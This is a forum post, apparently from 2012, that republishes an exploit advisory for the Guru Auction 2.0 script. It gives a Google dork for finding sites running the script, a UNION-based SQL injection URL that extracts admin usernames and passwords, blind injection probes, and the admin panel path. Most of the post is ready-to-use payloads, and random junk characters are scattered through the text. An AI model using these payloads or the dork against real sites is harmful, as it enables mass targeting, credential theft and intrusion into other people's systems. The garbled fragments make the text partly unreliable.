Guru Auction 2.0 Multiple SQL Injection Vulnerabilities0 Q4 t9 \ Z5 h0 f7 f0 n" l
# H9 j6 ^" c5 ]( R: ~* f作者 : v3n0m9 |! ]9 A3 {3 r5 \. `( z( s4 s
应用 : Guru Auction 2.0
& C0 a' c* L( k$ p NPrice : $49: n) Y1 m4 W2 ?/ E" N) @; x
Vendor : http://www.guruscript.com/9 a' Z2 w& D! W' J9 Z- C" _& `
Google Dork : inurl:subcat.php?cate_id=
7 f' }# {2 Y1 W: V U, O. W 0 ^9 T" N$ b3 ?) h' E7 F# ]1 G
SQLi p0c:
$ E7 [6 q* j0 ]2 W, w~~~~~~~~~~
" @7 d8 Z: x( l7 Z+ k! D phttp://domain.tld/[path]/subcat.php?cate_id=-9999+union+all+select+null,group_concat(user_name,char(58),password),null+from+admin--" \) z# ]' j/ S0 O+ b
2 ]) ] y7 R5 F2 S
' \4 P/ y/ d$ ]5 K4 a4 ]
盲注 p0c:
. m" e* q" |( m; d) V( E% `; @~~~~~~~~~~
! g) f* |* F, e: lhttp://www.political-security.com /[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=5 << true
+ Z7 {: d) z$ v, \! ^* vhttp://domain.tld/[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=4 << false
7 H1 s( I4 z) U( k( W + C% y4 p* b1 z# |* N6 }
管理登录入口:. b0 X ~% |/ ~8 [7 W
~~~~~~~~~~
6 L+ L" N( c4 X1 n: c- J8 \http://domain.tld/[path]/admin/
, R9 u; f5 r' _' L+ i |
发表于 2012-12-31 09:24:05
收藏
支持
反对